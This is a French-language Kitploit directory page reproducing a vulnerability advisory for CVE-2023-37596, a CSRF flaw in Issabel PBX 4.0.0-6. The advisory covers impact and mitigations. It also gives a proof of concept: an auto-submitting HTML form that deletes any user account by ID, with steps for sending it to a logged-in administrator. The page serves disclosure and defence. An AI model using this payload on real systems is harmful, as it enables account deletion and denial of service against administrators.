Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-37596 — CVE-2023-37596 is a Cross-Site Request Forgery (CSRF) vulnerability discovered in Issabel PBX version 4.0.0-6, a widely used open-source Unified Communications platform. | Kitploit
Outils/GitHubGitHub/sahiloj/cve-2023-37596
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 is a Cross-Site Request Forgery (CSRF) vulnerability discovered in Issabel PBX version 4.0.0-6, a widely used open-source Unified Communications platform.

Voir le dépôt
11il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-37596 — issabel-pbx 4.0.0-6 : Cross-Site Request Forgery (CSRF) — Supprimer n'importe quel utilisateur

Sévérité: Élevée  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Impact
  • Version concernée
  • Scénario d'attaque
  • Preuve de concept (Étapes pour reproduire)
  • Atténuation / Correction
  • Références
  • Calendrier de divulgation
  • Auteur

Aperçu

Une vulnérabilité de Cross-Site Request Forgery (CSRF) a été découverte dans Issabel PBX version 4.0.0-6. Le point de terminaison de gestion des utilisateurs n'implémente aucune protection CSRF, ce qui permet à un attaquant distant non authentifié de créer une page web malveillante qui — lorsqu'elle est visitée par un administrateur Issabel authentifié — supprime silencieusement n'importe quel compte utilisateur du système. Une exploitation répétée peut rendre l'ensemble de l'application inaccessible en supprimant tous les utilisateurs administratifs.


Détails de la vulnérabilité


Impact

Étant donné qu'Issabel PBX ne valide pas l'origine des requêtes modifiant l'état de son interface de gestion des utilisateurs, une attaque CSRF réussie permet à un attaquant de :

  • Supprimer n'importe quel compte utilisateur — y compris l'administrateur principal — à l'insu de la victime.
  • Provoquer un déni de service (DoS) — en supprimant tous les utilisateurs, personne ne peut se connecter, rendant le panneau d'administration PBX complètement inaccessible.
  • Perturber les services téléphoniques — la configuration et la gestion du système téléphonique deviennent indisponibles jusqu'à ce que le compte soit récupéré manuellement au niveau du serveur.

Version concernée

ProduitVersion concernéeStatut
issabel-pbx4.0.0-6Vulnérable

Scénario d'attaque

Un attaquant héberge une page HTML malveillante contenant une requête HTTP falsifiée ciblant le point de terminaison de suppression d'utilisateur de l'application Issabel PBX. L'attaque est déclenchée automatiquement (ou par un clic sur un bouton) lorsqu'un utilisateur déjà authentifié dans Issabel visite la page malveillante dans le même navigateur. Étant donné que le navigateur inclut automatiquement les cookies de session de la victime avec chaque requête, le serveur accepte la requête de suppression falsifiée comme légitime.

Aucun privilège spécial n'est requis du côté de l'attaquant — seulement un vecteur d'ingénierie sociale (lien de phishing, publicité malveillante, etc.) pour attirer l'administrateur authentifié vers la page conçue.

Caractéristiques clés de cette attaque :

  • Aucune authentification requise du côté de l'attaquant.
  • Un seul clic (ou même zéro clic si des `` / formulaires à soumission automatique sont utilisés) suffit pour déclencher l'exploit.
  • N'importe quel ID utilisateur (par exemple, id=1, id=2, …) peut être ciblé en modifiant la charge utile.
  • L'attaque est invisible pour la victime ; la page peut afficher un contenu non lié tout en soumettant silencieusement la requête falsifiée.

Preuve de concept (Étapes pour reproduire)

Prérequis

  • Burp Suite (édition Community ou Professional)
  • Un navigateur configuré pour proxyer le trafic via Burp Suite
  • Une instance d'Issabel PBX 4.0.0-6 accessible sur le réseau

Étape 1 — Se connecter en tant qu'administrateur

Accédez à la page de liste des utilisateurs Issabel PBX et authentifiez-vous avec les identifiants d'administrateur :

root@kitploit:~
https://<Issabel-IP>/index.php?menu=userlist

Step 1 — Issabel PBX user list


Étape 2 — Capturer la requête de suppression d'utilisateur dans Burp Suite

  1. Avec le proxy Burp Suite actif, cliquez sur le bouton Supprimer à côté de l'utilisateur cible.
  2. Dans Proxy → HTTP history de Burp Suite, localisez la requête DELETE/POST capturée.
  3. Faites un clic droit sur la requête et sélectionnez Engagement Tools → Generate CSRF PoC.

Step 2 — Capturing delete request in Burp Suite


Étape 3 — Générer et enregistrer l'exploit CSRF

Burp Suite produira une page HTML similaire à celle ci-dessous. Enregistrez-la sous forme de fichier .html (par exemple, csrf_exploit.html) :

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Remarque : Remplacez <Issabel-IP> par l'adresse IP ou le nom d'hôte du serveur cible, et ajustez la valeur id pour cibler un autre compte utilisateur.


Étape 4 — Livrer l'exploit à l'administrateur authentifié

Envoyez le fichier csrf_exploit.html (ou un lien vers l'endroit où il est hébergé) à un utilisateur actuellement connecté à Issabel PBX. Lorsque la victime ouvre la page, le formulaire est soumis automatiquement et l'utilisateur cible est supprimé sans aucune invite de confirmation.

Step 4 — CSRF exploit executed, user deleted

Step 4 — Confirmation that the user has been removed


Atténuation / Correction

Les défenses suivantes doivent être appliquées par le fournisseur et/ou les administrateurs système pour corriger cette vulnérabilité :

  1. Implémenter des jetons CSRF — Générer un jeton cryptographiquement aléatoire, par session (ou par requête) et le valider côté serveur pour chaque requête modifiant l'état. Les requêtes ne portant pas de jeton valide doivent être rejetées.
  2. Attribut SameSite du cookie — Définir l'attribut SameSite du cookie de session sur Strict ou Lax pour empêcher les requêtes cross-origin de transporter le cookie de session dans la plupart des navigateurs.
  3. Vérifier l'en-tête Origin / Referer — Côté serveur, rejeter toute requête modifiant l'état dont l'en-tête Origin ou Referer ne correspond pas au domaine de l'application.
  4. Demander une ré-authentification pour les actions destructrices — Inviter l'utilisateur à saisir à nouveau son mot de passe avant de traiter des actions irréversibles telles que la suppression de comptes utilisateur.
  5. Appliquer le principe du moindre privilège — S'assurer que seuls les utilisateurs ayant un rôle d'administrateur explicite peuvent accéder à la fonctionnalité de suppression d'utilisateur, réduisant ainsi l'impact d'une attaque réussie.

Jusqu'à ce qu'un correctif du fournisseur soit disponible, il est conseillé aux administrateurs de :

  • Restreindre l'accès au panneau d'administration Issabel PBX aux adresses IP de confiance via des règles de pare-feu.
  • Éviter de naviguer sur des sites web non fiables tout en étant connecté au panneau d'administration.

Références

  • NVD — CVE-2023-37596
  • OWASP — Cross-Site Request Forgery (CSRF)
  • CWE-352: Cross-Site Request Forgery (CSRF)
  • Issabel PBX Official Website
  • IssabelFoundation/issabelPBX on GitHub
  • PortSwigger — CSRF

Calendrier de divulgation

DateÉvénement
10/07/2023Vulnérabilité découverte et signalée
10/07/2023CVE-2023-37596 attribué

Auteur

Sahil Ojha

  • Chercheur en sécurité
  • CVE: CVE-2023-37596

Avertissement : Ce dépôt est publié uniquement à des fins éducatives et de divulgation responsable. Les informations fournies ici ne doivent pas être utilisées pour attaquer des systèmes sans autorisation écrite explicite du propriétaire du système. L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.

Télécharger l’outil
ChampValeur
Identifiant CVECVE-2023-37596
Type de vulnérabilitéCross-Site Request Forgery (CSRF)
CWECWE-352
ProduitIssabel PBX
Version vulnérable4.0.0-6
Page d'accueil du fournisseurhttps://www.issabel.org/
Dépôt logicielhttps://github.com/IssabelFoundation/issabelPBX
Testé surWindows
Publié CVE10/07/2023
Découvert parSahil Ojha